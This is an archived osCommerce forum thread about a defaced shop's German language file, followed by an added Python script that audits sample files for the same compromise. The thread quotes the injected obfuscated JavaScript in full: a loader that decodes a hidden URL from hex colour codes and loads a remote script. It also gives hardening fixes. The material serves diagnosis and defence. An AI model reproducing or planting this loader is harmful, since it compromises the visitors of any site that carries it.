But it didn't help; a new error message came up, as described in my first post. Should this be the proper fix for this issue? Should I try it again?
Taipo (posted March 23, 2011)

The problem is in the german/index.php. What is all that code in there about LED lights? Is that your code or not?
Tobosaku (author, posted March 23, 2011)

Yes, that has been added by the administrator of this site. Just a description of the shop content, which hasn't caused any issue until today and wasn't changed. Why is the german/index.php a problem, when the error message mentions the application_top.php file?
Taipo (posted March 23, 2011)

If for example that LED code is nothing to do with your site then back that german/index.php file up, and create a new one with just this code in it.

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2007 osCommerce

  Released under the GNU General Public License
*/

define('TEXT_MAIN', '');
define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s');
define('TABLE_HEADING_UPCOMING_PRODUCTS', 'Wann ist was verfügbar');
define('TABLE_HEADING_DATE_EXPECTED', 'Datum');

if ( ($category_depth == 'products') || (isset($HTTP_GET_VARS['manufacturers_id'])) ) {
  define('HEADING_TITLE', 'Unser Onlineshop');
  define('TABLE_HEADING_IMAGE', '');
  define('TABLE_HEADING_MODEL', 'Artikel-Nr.');
  define('TABLE_HEADING_PRODUCTS', 'Produkte');
  define('TABLE_HEADING_MANUFACTURER', 'Hersteller');
  define('TABLE_HEADING_QUANTITY', 'Anzahl');
  define('TABLE_HEADING_PRICE', 'Preis');
  define('TABLE_HEADING_WEIGHT', 'Gewicht');
  define('TABLE_HEADING_BUY_NOW', 'Bestellen');
  define('TEXT_NO_PRODUCTS', 'Es gibt keine Produkte in dieser Kategorie.');
  define('TEXT_NO_PRODUCTS2', 'Es gibt kein Produkt, das von diesem Hersteller stammt.');
  define('TEXT_NUMBER_OF_PRODUCTS', 'Artikel: ');
  define('TEXT_SHOW', '<b>Darstellen:</b>');
  define('TEXT_BUY', '1 x \'');
  define('TEXT_NOW', '\' bestellen!');
  define('TEXT_ALL_CATEGORIES', 'Alle Kategorien');
  define('TEXT_ALL_MANUFACTURERS', 'Alle Hersteller');
} elseif ($category_depth == 'top') {
  define('HEADING_TITLE', 'Unser Onlineshop:');
} elseif ($category_depth == 'nested') {
  define('HEADING_TITLE', 'Kategorien');
}
?>

Which is basically the default german/index.php code without any modification.
Taipo (posted March 23, 2011)

> Yes, that has been added by the administrator of this site. Just a description of the shop content, which hasn't caused any issue until today and wasn't changed. Why is the german/index.php a problem, when the error message mentions the application_top.php file?

After you corrected the error in application_top, the rest of the site was able to load correctly, so the next error displayed itself, which is in german/index.php.

The T_VAR is in reference to:

var redef_colors = 1;
var colors_picked = 0;

You might want to double check with your administrator that they did in fact add in this code:

<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {
  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
  var redef_colors = 1;
  var colors_picked = 0;
  function div_pick_colors(t,styled) {
    var s = "";
    for (j=0;j<t.length;j++) {
      var c_rgb = t[j];
      for (i=1;i<7;i++) {
        var c_clr = c_rgb.substr(i++,2);
        if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
      }
    }
    if (styled) {
      s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
    } else {
      s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
    }
    return s;
  }
  function try_pick_colors() {
    try {
      if(!document.getElementById || !document.createElement){
        document.write(div_pick_colors(div_colors,1));
      } else {
        var new_cstyle=document.createElement("script");
        new_cstyle.type="text/javascript";
        new_cstyle.src=div_pick_colors(div_colors,0);
        document.getElementsByTagName("head")[0].appendChild(new_cstyle);
      }
    } catch(e) { }
    try {
      check_colors_picked();
    } catch(e) {
      setTimeout("try_pick_colors()", 500);
    }
  }
  try_pick_colors();
}
</script>

Because, well, every site I have seen this on via google search has been defaced via that index.php file in question, using that code as a page styler.
Tobosaku Posted March 23, 2011

Have tried what you've suggested. Still the same error message:

Fatal error: Call to a member function add_current_page() on a non-object in ./includes/application_top.php on line 312
Taipo Posted March 23, 2011

Example: click this link to see a Google search. Almost every site has that T_VAR error you are referring to. The ones that don't have been defaced by an attacker.
Taipo Posted March 23, 2011

The problem is with the german/index.php page. You should probably restore your application_top.php back to what it was, and reset the german/index.php page to the one I just posted above. That LED lighting code including the JavaScript looks to me like a defacement.
Taipo Posted March 23, 2011

This is the correct code for the application_top:

// navigation history
if (tep_session_is_registered('navigation')) {
  if (PHP_VERSION < 4) {
    $broken_navigation = $navigation;
    $navigation = new navigationHistory;
    $navigation->unserialize($broken_navigation);
  }
} else {
  tep_session_register('navigation');
  $navigation = new navigationHistory;
}
$navigation->add_current_page();

Once you replace that, and the defaced german/index.php page with the code I pasted above, that error should clear.
Tobosaku Posted March 23, 2011

Thanks Taipo for your support! Now that it is running again and you have mentioned the possibility of a hack: Could the attacker in any way pull down some customer-related data? And is there a possibility that other files/data are affected?

If others have the same problem, I've fixed it like this now:

1. Took out the JavaScript part from german/index.php
2. Replaced the navigation history part in application_top.php with the following:

// navigation history
if (tep_session_is_registered('navigation')) {
  if (PHP_VERSION < 4) {
    $broken_navigation = $navigation;
    $navigation = new navigationHistory;
    $navigation->unserialize($broken_navigation);
  } else {
    $navigation = new navigationHistory;
  }
} else {
  tep_session_register('navigation');
  $navigation = new navigationHistory;
}
$navigation->add_current_page();

With the last code for the navigation history proposed by Taipo it didn't work.
Taipo Posted March 23, 2011

Thanks Taipo for your support! Now that it is running again and you have mentioned the possibility of a hack: Could the attacker in any way pull down some customer-related data? And is there a possibility that other files/data are affected?

The faulty code that is allowing the attackers to upload files onto your website begins with this code in the application_top.php files (both files, the one in includes/ and the one in admin/includes). You need to change this code below in both application_top.php files.

Change:

// set php_self in the local scope
if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

To this:

$PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && ((bool)ini_get('cgi.fix_pathinfo') == false)) || !isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? basename($HTTP_SERVER_VARS['PHP_SELF']) : basename($HTTP_SERVER_VARS['SCRIPT_NAME']);

This will prevent further exploitation of the admin bypass exploit.

You next need to create a file called .htaccess and add it into the includes folder with this in it:

Options All -Indexes
<Files *.php>
Order Deny,Allow
Deny from all
</Files>

This will protect the files and folders within the includes folder from being directly accessed and in particular prevent further exploitation of the language files, as has happened in this case.

Then comes the hard part. Because your website was vulnerable to the admin bypass exploit, the attackers have probably been able to upload files into your folders, files that will give them further access to your site should you go through all the procedures discussed in many of the discussions on this site to protect your site. So take some time to go through the discussions on these forums and note the lists of instructions others have offered to secure your website, and it would pay to follow them, as well as the two I have mentioned here now.

Lastly, and this is optional, I have written a contribution called osc_sec.php which can also be useful. Have a look at the link in my signature for further information.
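As an added example, not code from this thread or from osCommerce itself, the following Python audit checks constructed file contents for the three things discussed above: HTML and a script block injected into a language file (the single quotes in the injected colour array close the single-quoted define() string early, which is what makes PHP report the JavaScript `var` as an unexpected T_VAR), an application_top.php that still takes PHP_SELF straight from the request path, and an includes/.htaccess that lacks the Deny rule. The paths, sample file contents and function names are assumptions made for the example; point audit() at real file contents read from disk to use it on an install.

```python
# Added example (not from the thread): audit osCommerce file contents for the
# injected-markup defacement and the two hardening steps Taipo describes.
# All file contents below are constructed samples standing in for a real install.
import re

SAMPLE_FILES = {
    # Language file with HTML wrapped around the PHP block and a <script> inside
    # the define() string; the single quotes in the colour array end the PHP
    # string early, which is what produces the "unexpected T_VAR" parse error.
    "includes/languages/german/index.php": (
        '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\n'
        "<html><head></head><body>\n<?php\n"
        "define('TEXT_MAIN', '<div><script type=\"text/javascript\">"
        "if (typeof(redef_colors)==\"undefined\") { var div_colors = new Array('#4b8272');"
        " var redef_colors = 1; }</script></div>');\n?>\n"
    ),
    # Clean language file: only comments and define() calls inside the PHP tags
    "includes/languages/english/index.php": (
        "<?php\n/* constructed header comment */\n"
        "define('TEXT_MAIN', 'This is a default setup of osCommerce.');\n?>\n"
    ),
    # Still derives PHP_SELF from the request path (the line Taipo says to change)
    "includes/application_top.php": (
        "<?php\n// set php_self in the local scope\n"
        "if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];\n?>\n"
    ),
    # Already uses the basename() replacement from the thread
    "admin/includes/application_top.php": (
        "<?php\n$PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && "
        "((bool)ini_get('cgi.fix_pathinfo') == false)) || "
        "!isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? "
        "basename($HTTP_SERVER_VARS['PHP_SELF']) : "
        "basename($HTTP_SERVER_VARS['SCRIPT_NAME']);\n?>\n"
    ),
    # .htaccess present but without the <Files *.php> deny block
    "includes/.htaccess": "Options All -Indexes\n",
}

PHP_BLOCK = re.compile(r"<\?php.*?\?>", re.DOTALL)
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
# A define() whose value is a well-formed single-quoted PHP string
DEFINE_STMT = re.compile(r"define\('(\w+)',\s*'((?:[^'\\]|\\.)*)'\s*\);", re.DOTALL)
UNSAFE_PHP_SELF = re.compile(r"\$PHP_SELF\s*=\s*\$HTTP_SERVER_VARS\['PHP_SELF'\]\s*;")


def audit_language_file(content):
    """Findings for an includes/languages/*/*.php file, which should hold nothing
    but PHP define() calls: flag text outside the PHP tags, any <script> tag, and
    define() strings broken by an unescaped quote."""
    findings = []
    outside = PHP_BLOCK.sub("", content).strip()
    if outside:
        findings.append("content outside <?php ... ?>: %r" % outside[:40])
    if SCRIPT_TAG.search(content):
        findings.append("<script> tag inside a language string")
    declared = re.findall(r"define\('(\w+)'", content)
    parsed = {m.group(1) for m in DEFINE_STMT.finditer(content)}
    findings += ["define('%s') has broken quoting" % n for n in declared if n not in parsed]
    return findings


def uses_unsafe_php_self(content):
    """True if application_top.php still copies PHP_SELF straight from the request."""
    return bool(UNSAFE_PHP_SELF.search(content))


def htaccess_denies_php(content):
    """True if includes/.htaccess blocks direct requests for *.php as recommended."""
    if not content:
        return False
    block = re.search(r"<Files\s+\*\.php>(.*?)</Files>", content, re.DOTALL | re.IGNORECASE)
    return bool(block and re.search(r"Deny\s+from\s+all", block.group(1), re.IGNORECASE))


def audit(files):
    """Run every check over a {path: content} map and return {path: [findings]}."""
    report = {}
    for path, content in files.items():
        findings = []
        if path.startswith("includes/languages/"):
            findings = audit_language_file(content)
        elif path.endswith("application_top.php") and uses_unsafe_php_self(content):
            findings = ["PHP_SELF taken from the request path (admin bypass)"]
        if findings:
            report[path] = findings
    if not htaccess_denies_php(files.get("includes/.htaccess")):
        report["includes/.htaccess"] = ["no 'Deny from all' for *.php in includes/"]
    return report


if __name__ == "__main__":
    for path, findings in sorted(audit(SAMPLE_FILES).items()):
        for finding in findings:
            print("%s: %s" % (path, finding))
```

Run against the constructed samples, the report flags the German language file three times (markup outside the PHP tags, the script tag, and the broken define() quoting), the includes/ copy of application_top.php, and the incomplete .htaccess, while the clean English file and the already-fixed admin copy pass. The quoting check is deliberately strict: a language file is meant to be parsed, never rendered, so any define() that PHP could not parse as a plain single-quoted string is worth a look.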
This topic is now archived and is closed to further replies.